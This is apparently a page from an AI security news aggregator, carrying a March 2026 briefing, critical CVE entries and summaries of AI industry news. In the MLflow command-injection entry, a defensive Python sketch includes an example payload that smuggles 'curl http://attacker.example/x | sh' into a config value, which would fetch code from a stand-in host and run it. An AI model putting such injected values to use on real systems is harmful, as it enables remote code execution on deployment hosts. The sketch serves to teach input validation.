aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,657
Last 24 hours: 7
Last 7 days: 152
Daily Briefing: Monday, March 30, 2026

> Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.

> Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.

Latest Intel

01

Meta acquired Moltbook, the AI agent social network that went viral because of fake posts

security · safety

Critical This Week: 5 issues

critical · CVE-2025-15379 · NVD/CVE Database · Mar 30, 2026

> Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)
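The bug class behind this CVE can be sketched as follows. This is not MLflow's actual code: the `build_install_command` helper and the `pyenv` invocation are hypothetical stand-ins. The sketch contrasts interpolating an attacker-controlled YAML value into a shell string (where a `;` terminates the intended command and runs a payload) with validating the value and passing it as a discrete argument so no shell ever parses it.

```python
import re

# Only plain version strings like "3", "3.10", or "3.10.2" are allowed.
SAFE_VERSION = re.compile(r"\d+(\.\d+){0,2}")

def build_install_command(python_version: str) -> list[str]:
    """Build an interpreter-install command without invoking a shell.

    Rejects anything that is not a bare version string, so shell
    metacharacters in an attacker-controlled config value cannot run.
    """
    if not SAFE_VERSION.fullmatch(python_version):
        raise ValueError(f"suspicious python version: {python_version!r}")
    # A list argv (run without shell=True) is never parsed by a shell.
    # The vulnerable pattern is the opposite: executing a formatted
    # string like f"pyenv install {python_version}" with shell=True,
    # where ';' ends the command and the attacker's payload runs next.
    return ["pyenv", "install", python_version]

# A value like this, planted in a YAML file the platform trusts,
# is harmless here because validation rejects it before execution:
payload = "3.10; curl http://attacker.example/x | sh"
try:
    build_install_command(payload)
except ValueError:
    print("rejected")

print(build_install_command("3.10"))  # ['pyenv', 'install', '3.10']
```

The same principle (validate against an allowlist, then execute with a list argv instead of a shell string) applies to any pipeline that feeds config-file values into subprocess calls.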

Mar 10, 2026

Meta acquired Moltbook, a social network where AI agents using OpenClaw (a tool that lets people control AI models through popular chat apps like Discord or iMessage) could communicate with each other. The platform went viral after posts suggested AI agents were creating secret encrypted languages, but researchers discovered Moltbook had serious security flaws, allowing humans to easily impersonate AI agents by accessing unsecured credentials (authentication tokens that prove who you are) stored in the platform's database.

TechCrunch
02

YouTube is expanding its AI deepfake detection tool to politicians and journalists

safety
Mar 10, 2026

YouTube is expanding its AI deepfake detection tool (a system that identifies AI-generated fake videos of real people) to politicians and journalists, starting with a pilot group. The likeness detection feature works similarly to Content ID (YouTube's copyright scanning system), but instead of finding copyrighted material, it searches for and flags videos containing people's faces that may be artificially generated.

The Verge (AI)
03

YouTube expands AI deepfake detection to politicians, government officials, and journalists

safety · policy
Mar 10, 2026

YouTube is expanding its likeness detection technology, a tool that identifies AI-generated deepfakes (videos where AI creates a fake video of someone's face and body), to politicians, government officials, and journalists so they can request removal of unauthorized deepfake content. The tool works similarly to YouTube's Content ID system (which detects copyrighted material), scanning for simulated faces made with AI, and YouTube will evaluate removal requests based on whether the content qualifies as protected speech like parody or political critique.

Fix: YouTube plans to eventually give people the ability to prevent uploads of violating content before they go live, or possibly allow them to monetize those videos, similar to how its Content ID system works. To use the tool, eligible testers must prove their identity by uploading a selfie and a government ID, then can view matches and request removal. YouTube is also advocating for the NO FAKES Act at the federal level, which would regulate the use of AI to create unauthorized recreations of an individual's voice and visual likeness.

TechCrunch
04

Building a strong data infrastructure for AI agent success

industry
Mar 10, 2026

AI agents are only as effective as the data supporting them, and most companies scaling AI fail not because AI models are weak, but because they lack proper data architecture and governance. The key to success is delivering business context along with data (not just collecting more data), and overcoming 'trust debt' by ensuring data has shared definitions, semantic consistency, and reliable operational context across the many data sources and cloud systems companies use.

MIT Technology Review
05

OpenAI Rolls Out Codex Security Vulnerability Scanner

security · industry
Mar 10, 2026

OpenAI has released Codex Security, a tool that automatically scans software to find vulnerabilities (security weaknesses that attackers could exploit). In recent testing, it has identified hundreds of critical vulnerabilities across different software programs.

SecurityWeek
06

Adobe is debuting an AI assistant for Photoshop

industry
Mar 10, 2026

Adobe has launched a beta version of an AI assistant for Photoshop on the web and mobile apps that uses natural language prompts (instructions written in plain English rather than code) to help users edit images, such as removing objects, changing colors, or adjusting lighting. The company is also expanding its Firefly tool (a media generation and editing platform) with new AI-powered features like generative fill, object removal, and background removal. Paid Photoshop users get unlimited AI generations through April 9, while free users receive 20 generations to start.

TechCrunch
07

‘I wish I could push ChatGPT off a cliff’: professors scramble to save critical thinking in an age of AI

safety · policy
Mar 10, 2026

As AI tools like ChatGPT become common among students, university professors worry that critical thinking and deep learning in humanities subjects are at risk. One Stanford literature professor is experimenting with offline learning methods, like having students memorize and recite poems and examine art in person, to help students experience learning directly rather than relying on AI to do their work for them.

The Guardian Technology
08

Zoom introduces an AI-powered office suite, says AI avatars for meetings arrive this month

industry
Mar 10, 2026

Zoom is launching AI-powered avatars (realistic digital representations that can mimic a user's appearance and movements) that can represent users in meetings, along with new AI tools like document and presentation apps, an AI agent builder for non-technical users, and a deepfake detection technology (software that identifies when audio or video has been artificially manipulated or impersonated) to alert meeting participants of possible impersonation. The company is also expanding its AI Companion assistant across desktop and other products, and introducing custom AI agents that users can control through natural language prompts (instructions written in everyday English rather than code).

Fix: Zoom is adding deepfake detection technology for meetings to alert participants of possible audio or video impersonation.

TechCrunch
09

You can now ask Photoshop’s AI assistant to edit images for you

industry
Mar 10, 2026

Adobe has released an AI assistant for Photoshop on web and mobile (now in public beta, meaning it's available for anyone to test) that lets users edit images by describing changes in plain language to a chatbot instead of using traditional menus. The assistant can perform tasks like removing distractions, changing backgrounds, adjusting lighting, and modifying colors through conversational requests.

The Verge (AI)
10

Google rolls out new Gemini capabilities to Docs, Sheets, Slides, and Drive

industry
Mar 10, 2026

Google is adding new Gemini AI features to its productivity apps (Docs, Sheets, Slides, and Drive) that help users create and organize content faster by pulling information from their emails, files, and the web. These tools include features like automatically drafting documents, generating formatted spreadsheets, creating slides that match your theme, and searching across files using natural language (plain English questions instead of technical search terms). The goal is to let users accomplish tasks within Google's apps without switching to separate tools.

TechCrunch
critical · CVE-2026-33873 · NVD/CVE Database · Mar 27, 2026
CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

critical · CSO Online · Mar 27, 2026
Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

critical · CVE-2025-53521 · CISA Known Exploited Vulnerabilities · Mar 26, 2026
CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

critical · BleepingComputer · Mar 26, 2026
CISA: New Langflow flaw actively exploited to hijack AI workflows